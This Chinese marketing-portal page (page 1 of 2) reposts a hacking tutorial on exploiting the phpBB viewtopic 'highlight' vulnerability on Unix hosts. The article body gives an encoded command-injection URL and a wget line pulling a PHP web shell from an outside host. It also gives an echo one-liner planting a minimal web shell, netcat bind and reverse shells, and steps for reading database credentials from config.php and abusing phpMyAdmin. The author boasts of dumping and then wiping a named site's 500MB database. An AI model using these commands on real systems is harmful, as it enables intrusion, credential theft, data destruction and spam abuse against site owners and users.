今天是: | 首页 | 营销咨讯 | 推销技巧 | 网络营销 | 论文大全 | 外贸知识 | 市场信息 | 留言咨询 | 论坛 |
最 新 文 章
普通文章解读二八理论和长尾理论在…
普通文章雅虎倒向谷歌被反垄断部门…
普通文章网络视频营销漫路求索
普通文章涂料是否适合网络营销
普通文章IMPACT揭秘网络营销秘诀
普通文章广告也要得民心,令人生厌…
普通文章谷歌在华战略转向中小企业
普通文章博客营销文章写作技巧
普通文章网盛1800万收购中华纺织网
普通文章互联网进入营销阶段
最 新 热 门
普通文章解读二八理论和长尾理论在…
普通文章雅虎倒向谷歌被反垄断部门…
普通文章网络视频营销漫路求索
普通文章涂料是否适合网络营销
普通文章IMPACT揭秘网络营销秘诀
普通文章广告也要得民心,令人生厌…
普通文章谷歌在华战略转向中小企业
普通文章博客营销文章写作技巧
普通文章网盛1800万收购中华纺织网
普通文章互联网进入营销阶段
最 新 推 荐
推荐文章网站策划之栏目策划
推荐文章网络营销--创意致胜 充满“…
推荐文章Web2.0创业者面临艰难选择…
相 关 文 章
  • 如何恢复Photoshop的缺省设置

  • win2000server IIS和tomcat5…

  • Tomcat5+Mssql server 2000数…

  • 测试你对技术的掌握度:JSP程…

  • Eclipse 3.0 上配置JSP开发环…

  • Apache服务器之JSP概述篇

  • 配置Eclpise+tomcat并实现JS…

  • JAVA/JSP学习系列之二(Tomca…

  • JAVA/JSP学习系列之三(Resin…

  • zip版本Tomcat配置新手入门

    		•
    Q
    您现在的位置: 推销员 >> 网络营销 >> 网站建设 >> PHP代码学习 >> 文章正文
    phpBB的viewtopic highlight漏洞在unix下的入侵思路
    1. 文章作者:作者:ik www.zuso.org 2. 漏洞名称:phpBB viewtopic highlight= 漏洞

    3. 编写前言:
    虽然这个漏洞出了有一段时间, 但是到现在还是许多使用者没有更新.最近更是新出了
    phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋友拿到了数据库密码和
    文件目录却不知道如何使用.
    颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.
    两个漏洞不一样,但是思路我想还是可以借鉴的.
    呵, 废话不多说了, 漏洞是天天有新的,最主要的是你的思路.

    4. 漏洞用法:
    http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527
    CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!
    更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多介绍啰 :p

    5. 我的思路:
    一般发现论坛有问题之后, 我的第一步会是先检查他的权限, 以及我是否有足够权限写入!
    用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 或者 www !
    来寻找可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!
    嗯, 再来检查 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...
    如果有, 我的下一步就是 'wget -O ~path/files/ik.php
    http://www.xfocus.net/tools/200405/PhpShell.php'
    (希望可以写入呀, X客中国那次就是这样玩的!) 成功的话直接在 ~path/files 目录下就可以执行 ik.php 了!
    但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最基本的都没吧=_+)
    丢一个最小的 php shell 吧! 'echo "<? system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!
    用法就是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!
    试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!
    什么!? 他在 router (IP Share 后面怎办!?) 那就让他自己连回来吧, 先在我的 linux box 上面 'nc -l 6666' 开始监听!
    在目标上面再执行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功取得 shell 了!
    那... 如果以上方法都不行怎办!? 总不能就此放弃吧!? 因为是 php 使我不得不想到 phpmyAdmin 呀!
    来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 资料库总该借瞄一下吧!? 瞄不到, 密码也该借一下吧!?
    这个写着 MySQL 连线资讯的档案, 大家应该都会用猫 (cat) 去看! 但有的时候, cat 并不能使用, 该怎办呢?
    找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 基本上都可以用的! 若没有该指令就换下一个!
    得到这份密码, 令我想到更多事情可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!
    如果有, 就连到 ~path/phpmyadmin 然后用那组帐号密码进去帮他备分一下阿, 做人要厚道, 黑他之前也要备份一下哩 :p
    就像那次我黑 X客中国 就是如此, 将近 500mb 的资料库从中国抓到美国= =, 抓完才帮他清除资料库呢!
    当然啦, 除了帮他备份外, 更别忘了把自己变成管理员呀, 把 user_lever 改成 1 ! 呵, 酱就可以利用它来发广告信了! 爽 :~
    那... 如果没有 phpmyadmin 怎办!? 'nmap targetIP' 看看有没有开 MySQL 啰! 有的话就试试看从我这边自己装个 phpmyadmin...
    另外有些情形是, ~path/phpmyadmin 明明就存在, 但是就是 403 Foribben, 怎会酱!? 被 .htaccess 锁住了!
    就像那次 www.g***Q.com.tw 一样, 就只能说 'rm -fr ~path/phpadmin/.htaccess' 啰, 砍掉就可以成功登入了, 记得帮他备份呀! :p
    完了! 如果没有 phpmyadmin 然后他又不给我开 MySQL 怎办!? 那就试试看其他的, 'pwd' 看看我在哪!?

    本新闻共2页,当前在第1页  1  2  

    phpBB的viewtopic highlight漏洞在unix下的入侵思路
    作者:佚名 文章来源:www.top-sales.com.cn 点击数: 更新时间:2007-3-22     
    [ 字体:缩小 正常 放大 | 双击自动滚屏 ]
    请选择合适的字体颜色:
    文章录入:admin    责任编辑:admin 
  • 上一个文章:

  • 下一个文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 关于我们 | 友情链接 | 版权申明 |
    Copyright©2004-2006 top-sales.COM.cn All Rights Reserve
    版权所有:推销员门户